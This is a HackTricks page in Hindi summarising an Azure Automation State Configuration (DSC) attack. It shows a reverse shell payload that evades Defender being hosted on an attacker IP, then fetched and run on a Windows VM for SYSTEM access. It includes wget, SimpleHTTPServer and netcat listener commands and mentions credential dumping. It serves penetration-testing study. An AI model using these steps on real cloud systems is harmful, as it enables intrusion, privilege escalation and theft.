Az - State Configuration RCE

हैकट्रिक्स का समर्थन करें

पूरी पोस्ट देखें: https://medium.com/cepheisecurity/abusing-azure-dsc-remote-code-execution-and-privilege-escalation-ab8c35dd04fe

दूरस्थ सर्वर (C2) इंफ्रास्ट्रक्चर तैयारी और चरणों का सारांश

अवलोकन

इस प्रक्रिया में एक दूरस्थ सर्वर इंफ्रास्ट्रक्चर को सेटअप करने की शामिल है जो एक संशोधित Nishang Invoke-PowerShellTcp.ps1 पेलोड को होस्ट करता है, जिसे RevPS.ps1 नाम से जाना जाता है और विंडोज डिफेंडर को छलने के लिए डिज़ाइन किया गया है। पेलोड को एक Kali Linux मशीन से IP 40.84.7.74 का उपयोग करके एक सरल Python HTTP सर्वर से प्रदान किया जाता है। ऑपरेशन कई चरणों में निष्पादित किया जाता है:

चरण 1 — फ़ाइलें बनाएं

  • आवश्यक फ़ाइलें: दो PowerShell स्क्रिप्ट की आवश्यकता है:

  1. reverse_shell_config.ps1: एक इच्छित स्थिति कॉन्फ़िगरेशन (DSC) फ़ाइल जो पेलोड को लाती है और निष्पादित करती है। यह GitHub से प्राप्त की जा सकती है।

  2. push_reverse_shell_config.ps1: एक स्क्रिप्ट कॉन्फ़िगरेशन को वीएम पर प्रकाशित करने के लिए, GitHub पर उपलब्ध है।

  • कस्टमाइज़ेशन: इन फ़ाइलों में चरणों और पैरामीटर को उपयोगकर्ता के विशिष्ट वातावरण के अनुसार अनुकूलित किया जाना चाहिए, संसाधन नाम, फ़ाइल पथ, और सर्वर/पेलोड पहचानकर्ता समेत।

चरण 2 — कॉन्फ़िगरेशन फ़ाइल को ज़िप करें

  • reverse_shell_config.ps1 को .zip फ़ाइल में संकुचित किया जाता है, जिससे यह तैयार हो जाता है अज़्यूर स्टोरेज अकाउंट में स्थानांतरण के लिए।

Compress-Archive -Path .\reverse_shell_config.ps1 -DestinationPath .\reverse_shell_config.ps1.zip

चरण 3 — संग्रह संदर्भ सेट करें और अपलोड करें

  • ज़िप की गई कॉन्फ़िगरेशन फ़ाइल को Azure के Set-AzStorageBlobContent cmdlet का उपयोग करके एक पूर्वनिर्धारित Azure स्टोरेज कंटेनर, azure-pentest में अपलोड किया जाता है।

Set-AzStorageBlobContent -File "reverse_shell_config.ps1.zip" -Container "azure-pentest" -Blob "reverse_shell_config.ps1.zip" -Context $ctx

चरण 4 — काली बॉक्स की तैयारी

  • काली सर्वर एक GitHub रिपॉजिटरी से RevPS.ps1 पेलोड डाउनलोड करता है।

wget https://raw.githubusercontent.com/nickpupp0/AzureDSCAbuse/master/RevPS.ps1
  • स्क्रिप्ट को संपादित किया गया है ताकि लक्षित Windows VM और पोर्ट को रिवर्स शैल के लिए निर्दिष्ट किया जा सके।

चरण 5 — विनिर्माण फ़ाइल प्रकाशित करें

  • कॉन्फ़िगरेशन फ़ाइल को निष्पादित किया जाता है, जिससे रिवर्स-शैल स्क्रिप्ट को Windows VM पर निर्दिष्ट स्थान पर डिप्लॉय किया जाता है।

चरण 6 — पेलोड होस्ट और सेटअप सुनने वाला

  • एक Python SimpleHTTPServer शुरू किया जाता है ताकि पेलोड होस्ट किया जा सके, साथ ही एक Netcat लिस्टनर भी सेटअप किया जाता है जिससे आने वाली कनेक्शन को कैप्चर किया जा सके।

sudo python -m SimpleHTTPServer 80
sudo nc -nlvp 443
  • निर्धारित कार्य द्वारा पेलोड निष्पादित किया जाता है, सिस्टम स्तर की विशेषाधिकार प्राप्त किए जाते हैं।

निष्कर्ष

इस प्रक्रिया के सफल निष्पादन से आगे कई संभावनाएं खुलती हैं, जैसे क्रेडेंशियल डंपिंग या हमले को कई वीएम पर विस्तारित करना। गाइड आगे बढ़ने और आज़्यूर ऑटोमेशन डीएससी के क्षेत्र में सीखने और रचनात्मकता को प्रोत्साहित करता है।

हैकट्रिक्स का समर्थन करें

Last updated